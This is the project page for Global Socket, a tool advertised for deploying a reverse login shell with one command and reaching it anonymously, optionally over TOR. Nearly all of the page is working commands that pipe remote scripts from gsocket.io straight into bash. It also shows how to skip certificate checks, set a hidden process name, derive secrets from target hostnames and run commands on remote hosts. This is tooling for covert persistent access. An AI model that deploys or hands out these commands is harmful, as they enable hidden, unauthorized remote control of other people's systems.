Global Socket

Connect like there is no firewall. Securely.


Project maintained by hackerschoice Hosted on GitHub Pages — Theme by mattgraham

Deploy a reverse login shell with a single command (fully automated) - and access the shell remotely - encrypted - and via TOR if you like.

This must be the quickest way to access a system – anonymous

Use either one of these three commands to install, uninstall, and access:

  • Install

    bash -c "$(curl -fsSL gsocket.io/x)"
  • Uninstall

    GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
  • Access

    S="ExampleSecretChangeMe" bash -c "$(curl -fsSL gsocket.io/x)"
  • Install

    bash -c "$(wget --no-verbose -O- gsocket.io/x)"
  • Uninstall

    GS_UNDO=1 bash -c "$(wget --no-verbose -O- gsocket.io/x)"
  • Access

    S="ExampleSecretChangeMe" bash -c "$(wget --no-verbose -O- gsocket.io/x)"

Windows user need to manually install the binary. Contact us if you like to write a powershell deploy script.

Screenshots

Deploy on a host

Deploy-Example

Log in to the host from your workstation

Deploy-Login

Tips & Tricks

  • Ignore SSL / Certificate warnings

    bash -c "$(curl -fsSLk gsocket.io/x)"
  • Deploy with a predefined secret

    X=ExampleSecretChangeMe bash -c "$(curl -fsSL gsocket.io/x)"
  • Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP

    curl -fsSL http://nossl.segfault.net/deploy-all.sh && \
    bash deploy-all.sh
  • Ignore SSL / Certificate warnings

    bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"
  • Deploy with a predefined secret

    X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- gsocket.io/x)"
  • Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP

    wget --no-hsts http://nossl.segfault.net/deploy-all.sh && \
    bash deploy-all.sh

Useful environment variables:

S= Connect to a system (or use gs-netcat -s <secret> -il).
X= Set a predefined secret for the installation (X like in inXstallation).
GS_NOINST=1 Only start but without installing (will not survive a reboot).
GSOCKET_ARGS= Use additonal arguments. Most often used to force TOR in combination with S=, e.g. GSOCKET_ARGS="-T" S=<secret> bash -c "$(curl -fsSLk gsocket.io/x).
GS_DSTDIR= Set the installation directory. The default is to pick the most suitable automatically. Use find . -type d -writable.
GS_URL_BASE= Use URL for static binaries. The default is https://github.com/hackerschoice/binary/raw/main/gsocket/bin/.
GS_OSARCH= Force architecture. The default is to pick the most suitable automatically.
GS_DEBUG=1 Verbose output and other debug related settings. Often used together with GS_DEBUG=1 GS_NOSTART=1 GS_NOINST=1 bash -c "$(curl -fsSL gsocket.io/x)".
GS_HIDDEN_NAME= Use a custom hidden process name.
TMPDIR= Use a custom temporary directory. Try TMPDIR=$(pwd)

If all fails:

Download the static binary from https://github.com/hackerschoice/binary/tree/main/gsocket/bin (likely gs-netcat_x86_64-alpine.tar.gz) and extract and start gs-netcat manually:

curl -fsSL https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-alpine.tar.gz | tar xz -C /bin gs-netcat
SECRET=$(/bin/gs-netcat -g)
GSOCKET_ARGS="-liD -s $SECRET" /bin/gs-netcat
echo "Connect with: gs-netcat -s $SECRET -i" 
wget --no-check-certificate -qO- https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-alpine.tar.gz | tar xz -C /bin gs-netcat
SECRET=$(/bin/gs-netcat -g)
GSOCKET_ARGS="-liD -s $SECRET" /bin/gs-netcat
echo "Connect with: gs-netcat -s $SECRET -i" 

Advanced Tips & Tricks

Remembering many secrets from many deployments is cumbersome. It is easier to remember just one MASTER-SEED and derive the SECRET from the target’s hostname. The following script generates a secure SECRET based on a single MASTER-SEED and the target’s hostname.

# cut & paste this into your shell on your workstation or add to ~/.bashrc
gssec()
{
    str="$(echo "${GS_SEED:?}$1" | sha512sum | base64 | tr -d -c a-z0-9)"
    str="${str:0:22}"
    echo "DEPLOY: X=${str}"' bash -c "$(curl -fsSL gsocket.io/x)"'
    echo "ACCESS: S=${str}"' bash -c "$(curl -fsSL gsocket.io/x)"'
    echo "ACCESS: gs-netcat -s ${str} -i"
}

# Pick a STRONG master seed:
[[ -z $GS_SEED ]] && GS_SEED=MySuperStrongMasterSeed
# Generate a SECRET based on the SEED and 'alice.com'
$ gssec alice.com # You only need to know "alice.com" to connect.

# Output from above's command:
DEPLOY: X=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL gsocket.io/x)"
ACCESS: S=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL gsocket.io/x)"
ACCESS: gs-netcat -s 2m1zidi1zkkmxjjj0z0jlj -i
# cut & paste this into your shell on your workstation or add to ~/.bashrc
gssec()
{
    str="$(echo "${GS_SEED:?}$1" | sha512sum | base64 | tr -d -c a-z0-9)"
    str="${str:0:22}"
    echo "DEPLOY: X=${str}"' bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"'
    echo "ACCESS: S=${str}"' bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"'
    echo "ACCESS: gs-netcat -s ${str} -i"
}

# Pick a STRONG master seed:
[[ -z $GS_SEED ]] && GS_SEED=MySuperStrongMasterSeed
# Generate a SECRET based on the SEED and 'alice.com'
$ gssec alice.com # You only need to know "alice.com" to connect.

# Output from above's command:
DEPLOY: X=2m1zidi1zkkmxjjj0z0jlj bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"
ACCESS: S=2m1zidi1zkkmxjjj0z0jlj bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"
ACCESS: gs-netcat -s 2m1zidi1zkkmxjjj0z0jlj -i

Execute a single command (e.g. id) on a remote system:

echo 'id; exit; __START' | gs-netcat -s ExampleSecretChangeMe 2>/dev/null | sed -n '/__START/,$p' | tail +2

Get Involved. We are looking for volunteers to work on the website and a logo and to discuss new ideas. Join us on telegram.